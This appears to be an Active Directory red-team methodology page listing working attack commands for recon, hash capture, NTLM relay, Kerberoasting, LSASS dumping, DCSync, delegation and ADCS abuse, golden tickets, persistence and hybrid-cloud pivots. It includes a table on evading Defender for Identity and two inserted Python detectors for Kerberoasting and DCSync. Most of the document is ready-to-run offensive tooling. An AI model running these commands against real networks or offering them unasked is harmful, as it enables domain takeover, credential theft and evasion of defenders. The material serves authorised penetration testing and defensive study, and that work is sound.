From cybersec-toolkit
Active Directory red team methodology covering recon (BloodHound, PowerView), credential abuse (Kerberoasting, NTLM relay), escalation, lateral movement, persistence, ADCS abuse, and Defender evasion.
1. Recon AD structure offline (BloodHound, ADExplorer snapshot) — minimize live queries
```powershell
# SharpHound (C# collector) — most stealthy with throttling
SharpHound.exe -c All,GPOLocalGroup --Throttle 1000 --Jitter 30 --ZipFileName recon.zip
# Stealth collection (DC-only, avoids workstation noise)
SharpHound.exe -c DCOnly --Stealth
```
```bash
# bloodhound-python from Linux (no Windows host needed)
bloodhound-python -d corp.local -u user -p pass -ns 10.0.0.1 -c All
```
```powershell
# Domain enumeration without binaries (.NET, then PowerView cmdlets)
$d = [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()
Get-DomainUser -SPN | Select samaccountname,serviceprincipalname
Get-DomainComputer -Unconstrained
Get-DomainGPO | ?{$_.gpcmachineextensionnames -match "Restricted Groups"}
Get-DomainObjectAcl -Identity 'Domain Admins' -ResolveGUIDs |
    ?{$_.ActiveDirectoryRights -match 'WriteDacl|GenericAll|WriteOwner'}
```
```bash
# Take snapshot from any low-priv user (ADExplorer.exe → File → Create Snapshot), analyze offline
# Convert to BloodHound format
ADExplorerSnapshot.py snapshot.dat -o output/
```
```bash
# Capture NetNTLMv2 hashes from broadcast resolution
responder -I eth0 -wrf
```
```powershell
# Inveigh (Windows-side, when you have a foothold)
Invoke-Inveigh -ConsoleOutput Y -NBNS Y -mDNS Y -HTTP Y
```
Crack with hashcat mode 5600 (NetNTLMv2). If cracking fails, relay instead.
```bash
# Identify relay targets (no SMB signing, LDAP signing not required)
nxc smb 10.0.0.0/24 --gen-relay-list relay-targets.txt
# Relay to LDAP/LDAPS for ACL abuse, ADCS for cert request
impacket-ntlmrelayx -tf relay-targets.txt -smb2support \
    --escalate-user attacker --delegate-access
# Relay to ADCS Web Enrollment (ESC8) — requires HTTP endpoint up
impacket-ntlmrelayx -t http://ca/certsrv/certfnsh.asp \
    --adcs --template DomainController
```
```powershell
# Request TGS for all SPN-bearing accounts
Rubeus.exe kerberoast /outfile:tgs.txt /nowrap
# AES-only accounts (harder to crack but worth attempting)
Rubeus.exe kerberoast /aes /outfile:tgs_aes.txt
```
```bash
# Cross-platform from Linux
impacket-GetUserSPNs corp.local/user:pass -dc-ip 10.0.0.1 -request
hashcat -m 13100 tgs.txt rockyou.txt -r OneRuleToRuleThemAll.rule
# Find users with DONT_REQUIRE_PREAUTH set
impacket-GetNPUsers corp.local/ -usersfile users.txt -dc-ip 10.0.0.1 -no-pass
hashcat -m 18200 asrep.txt rockyou.txt
```
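Defender-side counterpart to the Kerberoast and AS-REP roast steps above, added here as an example (not code from the cybersec-toolkit page): it scans constructed, flattened 4769/4768 Security events for one account pulling RC4 service tickets for many SPNs in a short window, and for TGT requests by accounts with pre-authentication disabled. Field names follow the Security log XML; the thresholds, `enc_types` default and sample values are assumptions.

```python
"""Detect Kerberoasting and AS-REP roasting in Windows Security events.
Added example (not from the cybersec-toolkit page): constructed, flattened
4769/4768 events with Security-log field names; thresholds are assumptions."""
from collections import defaultdict
from datetime import datetime
# Constructed sample: jsmith pulls RC4 (0x17) TGS for three SPNs within seconds;
# the 4768 for legacy_app shows pre-auth disabled (PreAuthType=0).
SAMPLE_EVENTS = [
    "EventID=4769 TimeCreated=2025-01-10T09:00:01 TargetUserName=jsmith@CORP.LOCAL ServiceName=svc_sql TicketEncryptionType=0x17",
    "EventID=4769 TimeCreated=2025-01-10T09:00:02 TargetUserName=jsmith@CORP.LOCAL ServiceName=svc_web TicketEncryptionType=0x17",
    "EventID=4769 TimeCreated=2025-01-10T09:00:03 TargetUserName=jsmith@CORP.LOCAL ServiceName=svc_backup TicketEncryptionType=0x17",
    "EventID=4769 TimeCreated=2025-01-10T09:00:04 TargetUserName=jsmith@CORP.LOCAL ServiceName=DC01$ TicketEncryptionType=0x12",
    "EventID=4768 TimeCreated=2025-01-10T09:06:00 TargetUserName=legacy_app PreAuthType=0 TicketEncryptionType=0x17",
    "EventID=4768 TimeCreated=2025-01-10T09:06:01 TargetUserName=alice PreAuthType=2 TicketEncryptionType=0x12",
]

def parse(line):
    """Flattened 'Key=Value ...' event line -> dict."""
    return dict(kv.split("=", 1) for kv in line.split())

def find_kerberoasting(events, min_spns=3, window_s=300, enc_types=("0x17",)):
    """Accounts that obtain TGS with a listed etype for >= min_spns distinct
    user-SPN services (krbtgt and computer$ excluded) inside window_s seconds.
    Pass enc_types=("0x17", "0x12", "0x11") to also cover the /aes variant."""
    by_user = defaultdict(list)
    for e in events:
        svc = e.get("ServiceName", "")
        if (e["EventID"] == "4769" and e.get("TicketEncryptionType") in enc_types
                and not svc.lower().startswith("krbtgt") and not svc.endswith("$")):
            by_user[e["TargetUserName"]].append(
                (datetime.fromisoformat(e["TimeCreated"]), svc))
    hits = {}
    for user, reqs in by_user.items():
        reqs.sort()
        for i, (t0, _) in enumerate(reqs):  # window anchored at each request
            spns = {s for t, s in reqs[i:] if (t - t0).total_seconds() <= window_s}
            if len(spns) >= min_spns:
                hits[user] = sorted(spns)
                break
    return hits

def find_asrep_roasting(events):
    """4768 with PreAuthType 0 (pre-auth disabled): AS-REP crackable offline."""
    return sorted({e["TargetUserName"] for e in events
                   if e["EventID"] == "4768" and e.get("PreAuthType") == "0"})

def scan(lines):
    events = [parse(l) for l in lines]
    return find_kerberoasting(events), find_asrep_roasting(events)
```

Accounts that legitimately request many service tickets (monitoring, backup) will need an allow-list; the etype filter is what separates roasting from ordinary AES traffic.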
```cmd
:: Modern, AV-friendly: comsvcs.dll minidump
rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump <PID> C:\out.dmp full
:: Task Manager → lsass.exe → Create dump file (GUI route, no binary drop)
:: nanodump (handle duplication, no MiniDumpWriteDump)
nanodump.exe --pid <PID> -w lsass.dmp --valid
```
Parse with Mimikatz or pypykatz offline:
```bash
pypykatz lsa minidump lsass.dmp
```
| Right | Abuse |
|---|---|
| GenericAll / GenericWrite | Add SPN → Kerberoast; reset password; add member |
| WriteDacl | Grant yourself DCSync rights, then DCSync |
| WriteOwner | Take ownership → grant rights → exploit |
| AllExtendedRights (User) | Force password change |
| AllExtendedRights (Domain) | DCSync |
| AddMember | Add self to privileged group |
| WriteSPN | Set SPN, Kerberoast target |
```powershell
# Targeted Kerberoast (write SPN, roast, remove SPN)
Set-DomainObject -Identity victim -Set @{serviceprincipalname='fake/SPN'}
Rubeus.exe kerberoast /user:victim
Set-DomainObject -Identity victim -Clear serviceprincipalname
# Grant DCSync via WriteDacl (backtick is the PowerShell line continuation)
Add-DomainObjectAcl -TargetIdentity 'DC=corp,DC=local' `
    -PrincipalIdentity attacker -Rights DCSync
```
```powershell
# Find delegation
Get-DomainComputer -Unconstrained
Get-DomainUser -TrustedToAuth
Get-DomainComputer -TrustedToAuth
# Unconstrained → wait for / coerce DC auth, capture TGT
Rubeus.exe monitor /interval:5 /nowrap
# Constrained (S4U2self/S4U2proxy) — impersonate any user to allowed SPN
Rubeus.exe s4u /user:svc_acct /rc4:<hash> /impersonateuser:Administrator `
    /msdsspn:cifs/dc.corp.local /ptt
# Resource-Based Constrained Delegation (RBCD) — write msDS-AllowedToActOnBehalfOfOtherIdentity
# Requires GenericAll/GenericWrite on the target computer object
```
| Technique | Tool / RPC |
|---|---|
| PetitPotam | MS-EFSRPC (EfsRpcOpenFileRaw, EfsRpcEncryptFileSrv) |
| PrinterBug | MS-RPRN (RpcRemoteFindFirstPrinterChangeNotificationEx) |
| DFSCoerce | MS-DFSNM (NetrDfsRemoveStdRoot) |
| ShadowCoerce | MS-FSRVP |
| WebDAV | Search-and-replace UNC path embedded in any web fetch |
```bash
# Coerce + relay full chain
impacket-ntlmrelayx -t ldap://dc -smb2support --delegate-access &
PetitPotam.py -u low -p pass attacker-ip dc-ip
# Result: RBCD set, S4U → DA on coerced machine
```
```powershell
# Find GPOs you can edit
Get-DomainGPO | Get-DomainObjectAcl -ResolveGUIDs |
    ?{ $_.SecurityIdentifier -eq (Get-DomainUser current).objectsid `
       -and $_.ActiveDirectoryRights -match 'WriteProperty|WriteDacl' }
# SharpGPOAbuse — add scheduled task / immediate task to GPO
SharpGPOAbuse.exe --AddComputerTask --TaskName Update --Author NT\System `
    --Command cmd.exe --Arguments "/c net group 'Domain Admins' attacker /add /domain" `
    --GPOName "Workstation Policy"
```
```bash
certipy find -u [email protected] -p pass -dc-ip 10.0.0.1 -vulnerable -stdout
```
| ID | Misconfig | Exploitation |
|---|---|---|
| ESC1 | Client Auth + ENROLLEE_SUPPLIES_SUBJECT | Request cert with arbitrary UPN |
| ESC2 | Any Purpose EKU | Request cert valid for any use |
| ESC3 | Enrollment Agent | Request agent cert, then on-behalf-of any user |
| ESC4 | Vulnerable template ACL | Modify template to ESC1 |
| ESC6 | EDITF_ATTRIBUTESUBJECTALTNAME2 on CA | SAN injection on any template |
| ESC7 | Vulnerable CA ACL (ManageCA) | Approve own pending requests |
| ESC8 | Web Enrollment HTTP + no EPA | NTLM relay → cert |
| ESC9 | No security extension + UPN | UPN spoofing post-account-rename |
| ESC10 | StrongCertificateBindingEnforcement weak | UPN spoofing without rename |
| ESC11 | RPC unprotected (no ICertPassage IF_ENFORCEENCRYPTICERTREQUEST) | Relay over RPC |
| ESC13 | Issuance policy linked to group | Cert grants group membership |
| ESC14 | altSecurityIdentities write | Map attacker cert to admin |
| ESC15 | EKUwu — schema v1 templates | Inject EKU at request time |
```bash
# Request cert as Administrator
certipy req -u [email protected] -p pass -ca CORP-CA -template VulnTemplate \
    -upn [email protected]
# Use cert to get TGT and NT hash via UnPAC-the-Hash
certipy auth -pfx administrator.pfx -dc-ip 10.0.0.1
# Coerce any DC, relay to ADCS Web Enrollment, request DC cert
impacket-ntlmrelayx -t http://ca/certsrv/certfnsh.asp \
    --adcs --template DomainController &
PetitPotam.py attacker-ip dc.corp.local
# Result: cert for DC$ → TGT → DCSync
```
```bash
# PTH with NT hash
nxc smb 10.0.0.0/24 -u admin -H <NThash> --local-auth
impacket-psexec corp/admin@target -hashes :<NThash>
```
```powershell
# Overpass-the-Hash (NT hash → TGT, useful for Kerberos-only targets)
Rubeus.exe asktgt /user:admin /rc4:<NThash> /ptt
# Inject TGT
Rubeus.exe ptt /ticket:base64.kirbi
```
```bash
# Or from .ccache
KRB5CCNAME=admin.ccache impacket-secretsdump -k -no-pass dc.corp.local
# WinRM (no event logs in default channel for command exec)
evil-winrm -i target -u admin -H <hash>
# SMB exec without service creation (uses task scheduler)
impacket-atexec corp/admin@target -hashes :<hash> "whoami"
# WMI
impacket-wmiexec corp/admin@target -hashes :<hash>
```
```powershell
# DCOM (MMC20.Application, ShellWindows, ShellBrowserWindow)
Invoke-DCOM -ComputerName target -Method MMC20 -Command "calc.exe"
```
```bash
# Requires krbtgt NT hash (from DCSync)
impacket-ticketer -nthash <krbtgt-NT> -domain-sid S-1-5-21-... -domain corp.local Administrator
KRB5CCNAME=Administrator.ccache impacket-psexec -k -no-pass dc.corp.local
# Forge TGS for a specific service using its account hash
impacket-ticketer -nthash <svc-NT> -domain-sid <SID> -domain corp.local \
    -spn cifs/server.corp.local Administrator
```
```powershell
# Diamond — modify legitimate TGT in-flight (no krbtgt hash on wire)
Rubeus.exe diamond /tgtdeleg /ticketuser:Administrator /ticketuserid:500 /groups:512
```
```bash
impacket-secretsdump -just-dc-user 'corp/krbtgt' corp/admin@dc -hashes :<hash>
```
```powershell
# In-memory PowerShell variant (Mimikatz)
Invoke-Mimikatz -Command '"lsadump::dcsync /user:krbtgt"'
```
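Detection counterpart for the DCSync step above, added as an example (not code from the cybersec-toolkit page): Security event 4662 records the replication control-access rights being exercised, and any account other than a DC computer account using them warrants an alert. The constructed events are flattened with the `Properties` GUIDs joined by `;`; the DC account set and the `MSOL_` triage rule are assumptions, while the right GUIDs are the schema's own values.

```python
"""Detect DCSync-style replication in Security event 4662.
Added example (not from the cybersec-toolkit page): events are constructed and
flattened (Properties GUIDs joined with ';'); the DC account set is an
assumption, the control-access right GUIDs are the schema's own values."""

# Extended rights a replication partner exercises; DCSync asks for the first two.
REPL_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}
KNOWN_DC_ACCOUNTS = {"DC01$", "DC02$"}  # assumption: the domain's DC computer accounts

# Constructed sample: a DC replicating normally, a user account replicating
# (DCSync), an unrelated 4662 on another property, and the AAD Connect
# MSOL_ account doing its password-hash-sync replication.
SAMPLE_EVENTS = [
    "EventID=4662 SubjectUserName=DC02$ AccessMask=0x100 Properties=1131f6ad-9c07-11d1-f79f-00c04fc2dcd2",
    "EventID=4662 SubjectUserName=jsmith AccessMask=0x100 Properties=1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2",
    "EventID=4662 SubjectUserName=jsmith AccessMask=0x20 Properties=bf967a86-0de6-11d0-a285-00aa003049e2",
    "EventID=4662 SubjectUserName=MSOL_a1b2c3d4 AccessMask=0x100 Properties=1131f6ad-9c07-11d1-f79f-00c04fc2dcd2",
]

def parse(line):
    """Flattened 'Key=Value ...' event line -> dict."""
    return dict(kv.split("=", 1) for kv in line.split())

def find_replication_by_non_dc(events, known_dcs=KNOWN_DC_ACCOUNTS):
    """{account: sorted right names} for every 4662 in which a non-DC account
    exercised a replication right (AccessMask 0x100 = control access)."""
    hits = {}
    for e in events:
        if e.get("EventID") != "4662" or e.get("AccessMask") != "0x100":
            continue
        guids = e.get("Properties", "").lower().split(";")
        rights = {REPL_RIGHTS[g] for g in guids if g in REPL_RIGHTS}
        user = e.get("SubjectUserName", "")
        if rights and user not in known_dcs:
            hits.setdefault(user, set()).update(rights)
    return {u: sorted(r) for u, r in hits.items()}

def triage(hits):
    """MSOL_ (AAD Connect) accounts replicate legitimately but are a known
    pivot, so they rank 'review'; any other non-DC replicator is 'alert'."""
    return sorted((user, "review" if user.startswith("MSOL_") else "alert")
                  for user in hits)

def scan(lines):
    hits = find_replication_by_non_dc([parse(l) for l in lines])
    return hits, triage(hits)
```

On a real DC the `Properties` field of 4662 is multi-line with braces around each GUID, so the parser's join-by-`;` step is the part to adapt when reading from the event log directly.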
```text
mimikatz # !+
mimikatz # !processtoken
mimikatz # lsadump::dcshadow /object:CN=victim,... /attribute:primaryGroupID /value:519
mimikatz # lsadump::dcshadow /push
```
Add ACE granting your account GenericAll on CN=AdminSDHolder,CN=System,DC=corp,DC=local. SDProp propagates to all protected groups every 60 minutes.
```powershell
# Map trusts
Get-DomainTrust -SearchBase "DC=corp,DC=local"
Get-ForestTrust
```
```bash
# SID History injection (cross-forest if SID filtering disabled)
# ExtraSids in golden ticket → admin in trusted forest
impacket-ticketer -nthash <krbtgt> -domain-sid <child-SID> \
    -extra-sid S-1-5-21-<parent>-519 -domain child.corp.local Administrator
```
```powershell
# Trust ticket forging (inter-realm TGT)
Rubeus.exe asktgs /service:krbtgt/parent.local /ticket:trust-ticket.kirbi
```
| Pivot | Path |
|---|---|
| AAD Connect server compromise | Dump MSOL_ account → DCSync on-prem |
| Seamless SSO | Forge Kerberos ticket for AZUREADSSOACC$ → cloud SSO any user |
| PTA agent | DLL hijack Microsoft.Azure.SecurityTokenService → harvest cleartext |
| PHS hash sync | Read on-prem hashes from AAD Connect SQL (ADSync DB) |
| Federated trust | Forge SAML token via stolen ADFS token-signing cert (Golden SAML) |
| Pass-the-PRT | Steal PRT cookie from device → cloud session as user |
```powershell
# AADInternals — hybrid identity attack toolkit
Get-AADIntADSyncCredentials   # Extract MSOL_ creds from AAD Connect
Open-AADIntOffice365Portal -AccessToken $token
New-AADIntSAMLToken -ImmutableID 'a==' -Issuer 'http://sts/adfs/services/trust' `
    -PfxFileName 'token-signing.pfx'
```
| MDI Detector | Evasion |
|---|---|
| Honeytoken account access | Always check description and recent activity before hitting accounts |
| Reconnaissance via SAMR | Use ADWS / LDAP-only collection, throttle |
| Suspicious Kerberos delegation | Avoid noisy S4U2self chains on monitored DCs |
| Golden/Silver Ticket detection | Use Diamond/Sapphire variants; match legitimate ticket lifetime/encryption |
| DCSync from non-DC | Relay through legitimate replication-permitted accounts |
| Pass-the-Hash | Use overpass-the-hash to convert to Kerberos before lateraling |
```powershell
# Identify MDI sensors before noisy actions
Get-DomainComputer -SPN '*MicrosoftATA*'
Get-DomainComputer | ?{ $_.servicePrincipalName -match 'AATPSensor' }
```
```bash
# 1. Anonymous LDAP enum (no creds)
ldapsearch -x -H ldap://dc -s base -b "" "(objectclass=*)"
nxc ldap dc -u '' -p '' --users
# 2. Null SMB session
nxc smb dc -u '' -p '' --shares
impacket-rpcclient -U '' dc -no-pass
# 3. Password spray (low and slow)
nxc smb dc -u users.txt -p 'Winter2025!' --continue-on-success
# 4. Once authed: full enum + BloodHound
bloodhound-python -d corp.local -u user -p pass -ns dc -c All --zip
# 5. Identify attack path → execute → loot → persist
```